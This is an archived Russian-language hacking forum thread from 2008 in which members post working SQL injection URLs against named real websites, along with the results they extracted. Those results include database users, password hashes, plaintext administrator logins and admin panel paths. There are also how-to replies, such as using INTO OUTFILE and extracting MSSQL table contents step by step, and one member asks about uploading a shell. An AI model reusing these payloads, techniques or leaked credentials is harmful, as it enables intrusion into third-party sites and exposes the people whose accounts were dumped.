-1+union+select+1,2,3,concat_ws(%22:%22,id,login,pa ssword),5,6,7+from+admin/*

http://www.preproject.com/news%20manager/index.php?id=[sql]

-1+union+select+1,2,3,4,concat_ws(%22:%22,id,login, password),6,7+from+admin/*

ps скуля в демо двиге!

symbioin

22.04.2008, 19:16

http://auction.ua/auctions/one.htm?parent=-3242

159932

22.04.2008, 19:51

http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use rname,user_password),0,1+from+mognetforum.phpbb_us ers/*
http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,adm inlogin,admin,username,password),0,1+from+projectq ueue.user/*
Kumama:04f83a9025d99b309b427d9bde172fb7
Stiltzkin:4e25f9875fd790f28dfc8e97da43aece:SailorV 8
mognet.net/admin
mognet.net/forum/admin

.acme

22.04.2008, 21:32

http://www.tkastrey.ru/brand.php?id=-1+union+select+1,2,3,4,concat(user,0x3,password)+f rom+mysql.user--

user: site@zvm11.host.ru
db: astrey
version: 4.0.27

root0bcb2a3b366d4f3c
site5187d56e009fb910

Хэши не сбручены, но поставлены в очередь на hashcracking.info

Scipio

22.04.2008, 22:37

http://www.itsecurityportal.com/itsecurity_directory.asp?SearchString=a%')+and+1=@ @version--
http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@versio n

на серве несколько сайтов, все они узявимы в этих сриптах, единственное что, это меняется самый первый префикс, в зависимости от имени сайта

XJIOP

24.04.2008, 03:45

Blind SQL/XPath injection for numeric inputs
http://www.video24.ru:80/PasswordRecovery.aspx

request data (post или get хз)
__EVENTTARGET=111-222-1933email@address.com&__EVENTARGUMENT=111-222-1933email@address.com&__VIEWSTATE=%2FwEPDwUJMzkxNjczNjExD2QWAmYPZBYEAgEP ZBYIAgEPFgIeB2NvbnRlbnQFQFZpZGVvMjQgLSDQsNGA0LXQvd C00LAg0Lgg0L%2FQvtC60YPQv9C60LAg0LrQuNC90L4g0YTQuN C70YzQvNC%2B0LJkAgIPFgIfAAWAAtC60LjQvdC%2BINGE0LjQ u9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0Y LRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMIN GC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC1 0LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20L DRgdGLICDRhNCw0L3RgtCw0YHRgtC40LrQsCDRjdGA0L7RgtC4 0LrQsCDRgdC10YDQuNCw0LvRiyDQsdC70L7QutCx0LDRgdGC0L XRgNGLINC%2F0YDQtdC80YzQtdGA0YtkAgMPFgIfAAX%2FAdC6 0LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQ v9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0L rRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80L XQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQ u9GM0LzRiyDRg9C20LDRgdGLINGE0LDQvdGC0LDRgdGC0LjQut CwINGN0YDQvtGC0LjQutCwINGB0LXRgNC40LDQu9GLINCx0LvQ vtC60LHQsNGB0YLQtdGA0Ysg0L%2FRgNC10LzRjNC10YDRi2QC BA8WAh8ABYMB0LrRg9C%2F0LjRgtGMINGE0LjQu9GM0Lwg0LDR gNC10L3QtNCwINGE0LjQu9GM0LzQsCDRgdC60LDRh9Cw0YLRjC DRhNC40LvRjNC8INC%2F0L7RgdC70LXQtNC90LjQtSDRhNC40L vRjNC80Ysg0L3QvtCy0YvQtSDRhNC40LvRjNC80YtkAgMPZBYQ AgQPZBYCAgEPZBYCZg9kFgQCAQ8WAh4EVGV4dAXlAdCi0LDQut C%2B0Lkg0L%2FQvtC70YzQt9C%2B0LLQsNGC0LXQu9GMINC90L Ug0YHRg9GJ0LXRgdGC0LLRg9C10YIuPGJyLz7Qn9C%2B0L%2FR gNC%2B0LHRg9C50YLQtSDQtdGJ0LUsINC40LvQuCDQvtCx0YDQ sNGC0LjRgtC10YHRjCDQsiDRgdC70YPQttCx0YMg0YLQtdGF0L 3QuNGH0LXRgdC60L7QuSA8YSBzdHlsZT0iY29sb3I6b3Jhbmdl OyIgaHJlZj0iU3VwcG9ydC5hc3B4Ij7Qv9C%2B0LTQtNC10YDQ ttC60Lg8YT5kAgUPZBYEAgEPDxYCHghJbWFnZVVybAVNfi9DYX B0Y2hhSW1hZ2UuYXNweD9ndWlkPTdmY2E2MzdhNjcyYzRhMjZi OWNkYzMzYzkzODQwMTg2JndpZHRoPTIwMCZoZWlnaHQ9NzBkZA IDDw9kFgIeCm9ua2V5cHJlc3MFNnJldHVybiBjbGlja09uRW50 ZXIodGhpcywnY3RsMDBfY3BoQ29udGVudF9SZWNvdmVyeScpO2 QCBg8PFgIeB1Zpc2libGVnZBYEZg8WAh8BZWQCAQ8WAh8BBYUB PGlmcmFtZSBjbGFzcz0nJyBzdHlsZT0naGVpZ2h0OjIyMHB4O3 dpZHRoOjE4MHB4OycgZnJhbWVib3JkZXI9MCBzY3JvbGxpbmc9 bm8gc3JjPSdodHRwOi8vdmlkZW8yNC5ydS9kYXRhL2FkdnMvNi 9pbmRleC5odG0nPjwvaWZyYW1lPmQCCA9kFgICAQ8WAh4LXyFJ dGVtQ291bnQCChYUZg9kFgJmDxULACLQn9Cw0YDQuNC2LCDRjy DQu9GO0LHQu9GOINGC0LXQsdGPAzEwMAMxMDAi0J%2FQsNGA0L jQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDAi0J%2FQsN GA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDADMTAw CTQ5INGA0YPQsQk0OSDRgNGD0LFkAgEPZBYCZg8VCwRIaWdoI9 CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIy AjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuN GPAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQ uNGPAjIyAjIyCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgIPZBYCZg 8VCwAY0KPQu9GM0YLRgNCw0YTQuNC%
2B0LvQtdGCAjY3AjY3GNCj0LvRjNGC0YDQsNGE0LjQvtC70LXR ggI2NxjQo9C70YzRgtGA0LDRhNC40L7Qu9C10YICNjcCNjcJND kg0YDRg9CxCTQ5INGA0YPQsWQCAw9kFgJmDxULBEhpZ2gK0JLR i9C60YPQvwM0NzQDNDc0CtCS0YvQutGD0L8DNDc0CtCS0YvQut GD0L8DNDc0AzQ3NAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIED2QW AmYPFQsADtCg0YPRgdCw0LvQutCwAzE3MAMxNzAO0KDRg9GB0L DQu9C60LADMTcwDtCg0YPRgdCw0LvQutCwAzE3MAMxNzAJNDkg 0YDRg9CxCTQ5INGA0YPQsWQCBQ9kFgJmDxULBEhpZ2gR0K8g0L 7RgdGC0LDRjtGB0YwDMzY4AzM2OBHQryDQvtGB0YLQsNGO0YHR jAMzNjgR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OAk0OSDRgN GD0LEJNDkg0YDRg9CxZAIGD2QWAmYPFQsAJNCb0LjQutCy0LjQ tNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMDNDUzJNCb0L jQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMk 0JvQuNC60LLQuNC00LDRhtC40Y8gKNGB0LXRgNC40Y8gIDEpAz Q1MwM0NTMJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBw9kFgJmDxUL BEhpZ2gs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg 0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OCzQndCw0L%2FQsNC00L XQvdC40LUg0L3QsCAxMy3QuSDRg9GH0LDRgdGC0L7QugM1NDgs 0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw 0YHRgtC%2B0LoDNTQ4AzU0OAk0OSDRgNGD0LEJNDkg0YDRg9Cx ZAIID2QWAmYPFQsAJdCR0L7QuSDRgSDRgtC10L3RjNGOIDIgLS DQoNC10LLQsNC90YgCNDkCNDkl0JHQvtC5INGBINGC0LXQvdGM 0Y4gMiAtINCg0LXQstCw0L3RiAI0OSXQkdC%2B0Lkg0YEg0YLQ tdC90YzRjiAyIC0g0KDQtdCy0LDQvdGIAjQ5AjQ5CTQ5INGA0Y PQsQk0OSDRgNGD0LFkAgkPZBYCZg8VCwRIaWdoH9Cg0L7QutC% 2B0LLQsNGPINC60YDQsNGB0L7RgtC60LADNTI1AzUyNR%2FQoN C%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNR%2 FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUy NQM1MjUJNDkg0YDRg9CxCTQ5INGA0YPQsWQCCQ9kFgJmDxBkZB YAZAIKD2QWBGYPFgIfAWVkAgEPFgIfAWVkAgsPDxYCHwRnZGQC DA8PFgIfBGhkZAINDw8WBB8BBRLQmtC40L3QvtGC0LXQsNGC0Y AeC05hdmlnYXRlVXJsBRhodHRwOi8vY2luZW1hLmxvY2FsaG9z dC9kZBgBBR9jdGwwMCRjcGhDb250ZW50JE11bHRpVmlld0Zvcm 1zDw9kZmSgE12fR%2FaXraHX3N%2FRHjIlWVF1Dw%3D%3D&spos=111-222-1933email@address.com&ctl00%24SearchText=111-222-1933email@address.com+and+1%3D0&ctl00%24cphContent%24UserNameText=111-222-1933email@address.com&ctl00%24cphContent%24ctrlCaptcha%24tbCode=111-222-1933email@address.com&ctl00%24cphContent%24Recovery=111-222-1933email@address.com&__EVENTVALIDATION=%2FwEWCAKL55VmAsCH3ZkDAp3575QBAv Tb06MHApf5r%2BgPAvKJmnkCvb2C%2BQkC9qacmAFWO%2BU%2B G8WwJuHrrDX%2BErr05%2B2fSQ%3D%3D

159932

24.04.2008, 03:56

http://www.break-dance.it/pagine/italiano/forum/forums.php?id=-3+union+select+1,concat_ws(0x3a,user,password),3+f rom+users+limit+0,1/*
это чтото вроде админов или модеров но админку не нашёл ..
FrOz!:romanroman
FrA:mg2ymu

Momiji

24.04.2008, 04:41

http://www.break-dance.it/pagine/italiano/community/log.php

chekist

24.04.2008, 07:00

помогите составить запрос, инекция после order и limit

SELECT p.*, a.id AS agentid, a.name AS agent, a.user AS user, c.name AS company, c.id AS companyid, t.name AS type, p.type AS typeid
FROM mos_hp_properties AS p, mos_hp_companies AS c
LEFT JOIN mos_hp_agents AS a ON p.agent = a.id
LEFT JOIN mos_hp_prop_types AS t ON p.type = t.id
LEFT JOIN mos_hp_featured AS f ON f.property = p.id
WHERE p.published='1' AND p.approved='1' AND t.published='1'
AND a.company=c.id
AND (publish_up = '0000-00-00 00:00:00' OR publish_up <= NOW())
AND (publish_down = '0000-00-00 00:00:00' OR publish_down >= NOW())
AND (p.name LIKE '%1%' OR p.address LIKE '%1%' OR p.suburb LIKE '%1%'
OR p.state LIKE '%1%' OR p.country LIKE '%1%' OR p.intro_text LIKE '%1%'
OR p.full_text LIKE '%1%')
AND p.type=1
ORDER BY p.price asc
LIMIT [sql]

krypt3r

24.04.2008, 09:32

После ORDER и LIMIT можно попробовать INTO OUTFILE '/path/to/file'

it's my

24.04.2008, 12:54

хз вроде движок какого-то онлайн магазина:

http://www.odissey.kiev.ua/index.php?fullnews=-1+union+select+1,2,3,4,5/*
http://shop.ghettostreet.ru/index.php?fullnews=-1+union+select+1,2,3,4,5/*
админка по адресу хттп://сайт/admin/

Ded MustD!e

24.04.2008, 15:02

http://www.macspeech.com/
http://www.macspeech.com/pages.php?pID=-1+union+select+concat(admin_email_address,0x3a,adm in_password)+from+admin/*

PR: 7

bag

24.04.2008, 16:23

http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,concat_ws(0x3a,user,password ),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+mysql.user+limit+0,1/*
5.0.27
by admin:4ba58ad82e059055

http://innovateonline.info/index.php?view=article&id=999999999/**/UNION/**/SELECT/**/version()/*
5.0.24a-community-nt

Doom123

24.04.2008, 20:28

https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*

login:pass

парль зашифрован

base64_encode(pack('H*'sha1($apss)))

Схема БД(спасибо Scipio):

http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*

159932

24.04.2008, 22:25

http://it.festivalbar.music.yahoo.net/forum/view.php?id=23329+and+1=0+union+select+1,version() ,3,4,5,6,7,8,9,0,1,2,3/*
4.1.20-log
кроме таблы news - ничего не нашёл .. пробил на 450 табл ..

gibson

25.04.2008, 02:43

mccormick-intl.com

http://www.mccormick-intl.com/news_detail.php?nid=-1+union+select+name,password,3,4,5+from+users/*
Abi Harris
abi
abi@fifthelement.uk.com
4.0.13-nt:mccormi

acieap.com

http://www.acieap.com/news_detail.php?nid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()

),3,4/*
5.0.20-nt:annclark:annclark@localhost

annclarkassociates.com

http://www.annclarkassociates.com/news_detail.php?nid=-1+union+select+1,concat_ws(0x3a,version(),datab

ase(),user()),3,4/*

5.0.20-nt:annclark:annclark@localhost
admin
user
pass

afoundation.org.uk

http://www.afoundation.org.uk/greenlandstreet/details.php?id=-1+union+select+1,2,3,3,3,3,3,3,3,3,3,3,3

,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3/*

picoworld.com

http://www.picoworld.com/ourwork/details.php?id=31+union+select+1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,

0/*

petees.com
http://www.petees.com/details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1,2,3,4,5

,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*

bag

25.04.2008, 02:56

http://rus.gflora.com/index.php?cmd=genus_body&genus_id=999999999/**/UNION/**/SELECT/**/concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,1 1+from+mysql.user/*
root:*2825BE681C6102A9313382FB2405D76868BE5F32

imajo.ati

25.04.2008, 09:25

http://kb.arena.ru/kill.php?char=nickname'+UNION+SELECT+1,2--

кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена

Jokester

25.04.2008, 10:34

imajo.ati

Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо

P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html

Ded MustD!e

25.04.2008, 14:09

кавычки экранируются слешем, ничего путного у меня не выходит(
может быть вы поможете?
функция char() отключена

imajo.ati

Там MSSQL т.е у тебя запрос изначально не верен
Вот версия
_http://kb.arena.ru/kill.php?char=nickname'%20or%201=@@version--
Дальше сам если надо

P.s Вопросы сдесь
_https://forum.antichat.ru/thread46016.html

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+table_name +from+information_schema.tables)--
Получаем имя первой таблицы, через not+in+() получаем имена остальных таблиц, но так как стоит фильтр, то имена нужно кодировать, очень помог в этом Universal char SQL encoder by [53x]Shadow! (http://www.webfuture.ru/igo/convert.php)

Таким образом находим таблицу tLogins, колонки стандартные - login, password, id.

Выводим результат:

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login +as+nvarchar)%2Bcast(password+as+nvarchar)+from+tL ogins)--

Логин и пароль сливаются, мускул ругается на +, ну впринцыпе и так покатит;)

Так как все символы хэша не выводятся, сначала выводим первые 30, а потом с помощью команды substring(str,begin,length) - возвращает подстроку str, начиная с begin символа по счету длиной численно равной length, выводим недостающие 2 символа:

http://kb.arena.ru/kill.php?char=1'%20or%201=(select+top+1+cast(login +as+nvarchar)%2Bcast(substring(password,2,2)+as+nv archar)+from+tLogins)--

Перебирать логины через where+id=... у меня не получилось, опять ругается мускул, альтернатива: +where+login+not+in(), логины опять же кодируем.

The End.

bag

25.04.2008, 15:35

http://www.whiznews.com/article.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,unhex(hex(concat_ws(0x3a,user,password))),4/**/from/**/mysql.user/*
root:*044222DB9218BC78AACACF7654EA2B53ABCA925F

http://www.sydneyroosters.com.au/news.php?ArticleID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4/**/from/**/mysql.user/*
root:*6CBD12C8F805CFADB394E65458C4D9664F1866C6
cms_admin:378b243e220ca493
testing1:4ab87db330cd6bd5
root:*019BBA7CE94D4959118549E98F475D38EA733DA5 - хз откуда второй root ;)

http://www.chipdesignmag.com/display.php?articleId=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,unhex(hex(concat_ws(0x3a,user,password)) ),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/mysql.user/*
root:35976e334a7a830f
webadmin:48833ef87081f3cd

http://aainnovators.com/CMS/modules/wfsection/article.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28/**/from/**/mysql.user+limit+0,1/*
admin:47fb196942cea04a

http://dailybeacon.utk.edu/showarticle.php?articleid=999999999/**/UNION/**/SELECT/**/1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,1 1,12/**/from/**/mysql.user/*
root:49c206e707168c98

http://www.prowrestlingfans.com/inc/printArticle.php?articleID=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,1 1/**/from/**/mysql.user/*
root:*FA3D9981B584530E38A1BEB14DB9B74CB19FE4AE

http://www.snegohod-buran.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password)/**/from/**/mysql.user+limit+1,1/*
5fb4ffc22deb3e8c:vavaha

http://www.bike.ru/shop.php?CID=999999999/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user,password),4/**/from/**/mysql.user+limit+0,1/*
root::

d_x

25.04.2008, 16:16

Имена, логины и пассы админов в открытом виде:

http://la2.ru/events/tournament/?id='%20union%20select%20name,concat(login, ':', pass)%20from%20admins/*

Админка тут: http://la2.ru/admin (у всех админов разные права)

CaNNabi$

25.04.2008, 19:27

Postnuke Mod PostSchedule SQL Vuln

http://www.cpxsports.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
cpxAdmin:4fbf5fbba0800c1c0b6b7a33ff88155f

http://www.psp-vault.com/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
zmcnulty:ebf2de34b9c2b48b4abf5554816eb872

http://www.exactas.org/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
janus:bbcf33804c68e36630f938010413be58

http://www.lasvanskadolina.net/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
yadranko:cf9df8b725f3cd7607f30927a18d0bb2
yadranko:h5555yangtze

http://www.aifonline.it/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
adminworm:6730d9c3a47d9229d98cab97f2ddd089

http://www.frisktigers.no/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
Admin:0eb7e1f71974d5e5ae01a801d9395dfb
Admin:iceman

http://www.kaeferteamuenchen.de/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
hkoerber:5a3fc01488cb3a9e6e2ef4f87bb9daef

http://www.ungmor.dk/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
Admin:3b353f8d757cdf65c913f2711df7734a

http://www.wpi.pl/index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
wpi:6141afd4bec62ee61428cf9cef93c08f

Joomla (com_filiale)
http://www.brustart.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
http://www.gimb.be/index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users

Велемир

25.04.2008, 20:59

Поля в таблице Passwords

http://la2.ru/events/tournament/?id=-1'+union+select+column_name,2+from+information_sch ema.columns+where+table_name='passwords'/*

Окончательный список учёток и ниипёт:Р (Мошь надо кому было я хз,админки не тру:()).Вот ток XSS там валется куча(или одна бальшая),так шо будьте бдительны:Р

http://la2.ru/events/tournament/?id=-1'+union+select+concat_ws(0x3a,pw_id,pw_account,pw _pass,pw_email),2+from+passwords/*

Saime

25.04.2008, 23:46

nerdpics.net

http://www.nerdpics.net/view.php?id='1
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9--
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(user(),0x3a,database (),0x3a,version()),3,4,5,6,7,8,9--
nerdpics@localhost:nerdpics:5.0.38-Ubuntu_0ubuntu1-log
http://www.nerdpics.net/view.php?id=-1%20union%20select%201,concat(table_schema,0x3a,ta ble_name,0x3a,column_name),3,4,5,6,7,8,9+from+info rmation_schema.columns+where+column_name+LIKE%20/**/0x257061737325/**/--
user:User:Password

159932

26.04.2008, 17:54

www.policynetwork.net
http://www.policynetwork.net/main/article.php?article_id=-505+union+select+1,2,3,4,5,concat_ws(0x3a,admin_us ername,admin_password),7,8,9,0,1,2,3,4,5,6,7,8+fro m+admin/*
4.0.20-standard-log
http://www.policynetwork.net/admin
kendra:v0nhayek
philip:v0nhayek
alec:v0nhayek
mark:v0nhayek
dawn:v0nhayek
marcsidwell:3rdfloor
caroline:v0nhayek
================================================== ==

www.practicalfishkeeping.co.uk
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,administrator,pas s)+from+emap.administrators+limit+0,1/*
Matt Clarke:twolbperch
Jayne Phillips:ilovedavidsaxby
Rebecca Mee:iamthemanagerofpets
steve:hockey1
Bev Pearce:cheesywotsits
kate:ilikedatabases
Hannah:bluebellpub
Gareth:monkeyflaps
ian:forest
colleen:hockey
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,id,directory_name ,company_name,company_type,contact_name,job_title, contact_email,company_website,password)+from+emap. directory+limit+1145,1/*
~1150 юзверей ..

http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,username,password )+from+practical_fishkeeping.members_details+limit +58111,1/*
приличное кол-во юзверей .. ~ 58к ..

Saime

26.04.2008, 18:16

williampenn.net

http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21--
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
williampenn_db@208.109.181.71:williampenn_db:5.0.4 5-log
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(username,0x3a,pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21+from+login_table--
admin:wponline

beerhack

26.04.2008, 18:33

http://www.oqbo.ru/read.php?block=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,version(),database()),7,8,9/*

USER: u71738@10.10.223.233
VERSION: 5.0.45-log
DATABASE: u71738_oqbo

Есть табла
wp_users
~id
~user_login
~user_pass
~user_nicename
~user_email
~user_url
~user_registered
~user_activation_key
~user_status

но доступа к ней похоже нету :(

****************************************

http://pravostok.ru/ru/updates/index.php?from=10&id=-99999+union+select+1,2,concat_ws(0x3a,ADMINISTRATO R_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,11,12,13,1 4+from+ADMINISTRATOR/*

USER: pravostok@localhost
VERSION: 5.0.42
DATABASE: pravostok

ADMINISTRATOR
~ADMINISTRATOR_ID
~FIO
~LOGIN
~PASSWORD_MD5
~EMAIL
~IS_ROOT
~IS_LOCKED
~COUNT_BAD_ENTER

1:admin:b25483fbb2b1ed77fafbb0e7f42d1ea4
2:editor:911eb63cdea3eb02445404c5ef07d043
3: o_petr:92aff5dbd2bbe06c649e869f2135c720
4:news_editor:5b1620f0fbe4d77dcd8038bdf452aa24
5:editnews:e41edc7ad7e486391503ab6b0d474681
6:editij:59cd9699950909b9279715a812a06689
7:editornews:1f1c14601393842f6ad32c4dd275e235
8:wwww:e34a8899ef6468b74f8a1048419ccc8b(wwww)

Одминка тут: http://pravostok.ru/adm/

XaCeRoC

26.04.2008, 19:25

l2world.uz

http://l2world.uz/dp/i-search.php?=1833&itemid=1833+union+%09select+version(),concat(user( ),0x3a,user()),database(),4,5,6,7

Можно ли залить шелл ??

neon_fx

27.04.2008, 07:21

http://refe.org.ua/news.php?id=-178+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15/*

4.1.22-log

Nelzone

27.04.2008, 10:32

http://site.kz/index.php/newso/images/banners/news_unit.php?id=34658'
PostgreSQL

http://www.millionaireinyou.com/staff/view/?display=more&item_id=14'
PostgreSQL

http://arbitr.gov.ua/news.php?sub_section=2&news_id=9'
PostgreSQL

Zitt

27.04.2008, 13:52

http://www.wfsj.org/projects/page.php?id=-99999+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(U SER(),%20%200x71),0x71),5,6,7,8,9,10,11/*

Kaimi

27.04.2008, 18:57

http://www.zemax.ru/rsochi/search.php?otype_s=1&district_s=9999999%20union+select+1,2,3,4,5,6,7,co ncat(user(),0x7c,version(),0x7c,database()),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+us ers/*

neon_fx

28.04.2008, 01:52

http://www.blackbelt.com.ua/show.php?rand=1&id=-281+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15+from+mysql.user/*

4.1.22-standard-log
root@localhost
mysql.user доступна
root
5c46cc0a0b8560de

http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*

yegorkin_haty
yegorkin_haty@db.sirius.biz.ua
5.0.45-community-log

.acme

28.04.2008, 13:05

http://www.renoise.com/songs.php?pg=styles&id=-1008+union+select+1,2,3,4,5,6,concat(COLUMN_NAME,0 x2,TABLE_NAME),8,9,10,11,12,13,14,15,16,17+from+IN FORMATION_SCHEMA.COLUMNS+limit+17,1--

user: jdbc@localhost
db: renoise_db
version: 5.0.32-Debian_7etch5-log

.acme

28.04.2008, 14:25

http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15--

user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard

neon_fx

29.04.2008, 17:50

http://www.shoptop.kiev.ua/section.php?kat=6&subkat=-157+union+select+1,2,3,4,version(),user(),7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22/*

5.0.41-community-log
shoptop_user@localhost
shoptop_baze

/home/shoptop/domains/shoptop.kiev.ua/public_html/

на том же серваке :
http://www.bizcat.kiev.ua/section.php?kat=8&subkat=-157+union+select+1,2,3,4,version(),user(),user(),8 ,9,10%20,11,12,13,14,15,16,17,18,19,20,21/*

5.0.41-community-log
bizcat_user@localhost
/home/bizcat/domains/bizcat.kiev.ua/public_html/

http://www.bizcat.kiev.ua/section.php?kat=14&subkat=-130+union+select+1,2,3,4,version(),user(),7,8,9,10 %20,11,12,13,14,15,16,17,18,19,20,21/*

http://free-board.com.ua/section.php?kat=9&subkat=-84+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.crm-expert.com.ua/section.php?id=-7+union+select+1,1,3,database()/*

crm
4.1.22-log

А®ТеS

29.04.2008, 18:49

http://www.kino.com/
http://www.kino.com/video/news.php?news_id=-
